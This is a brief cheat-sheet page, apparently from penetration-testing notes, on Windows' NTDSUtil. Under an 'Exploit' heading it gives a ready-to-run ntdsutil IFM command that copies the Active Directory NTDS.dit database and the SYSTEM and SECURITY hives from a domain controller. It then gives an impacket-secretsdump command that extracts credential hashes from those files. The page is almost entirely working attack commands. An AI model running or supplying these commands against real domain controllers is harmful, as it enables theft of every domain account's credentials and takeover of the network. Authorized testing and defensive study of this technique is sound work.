# NTDSUtil

## NTDSUtil

*NTDSUtil* is a command-line tool in Windows Server used for managing the NTDS.dit database, including database maintenance, backup and restore, and more.

{% hint style="info" %}
*ntdsutil.exe* should be run from the command line on a Domain Controller
{% endhint %}

## Exploit

{% code title="Windows" %}

```fish
## Use ntdsutil.exe to obtain the NTDS.dit file and the SYSTEM and SECURITY hives
ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q
```

{% endcode %}

{% code title="Linux" %}

```fish
## Use impacket-secretsdump To Parse The Exfiltrated Files
impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit LOCAL
```

{% endcode %}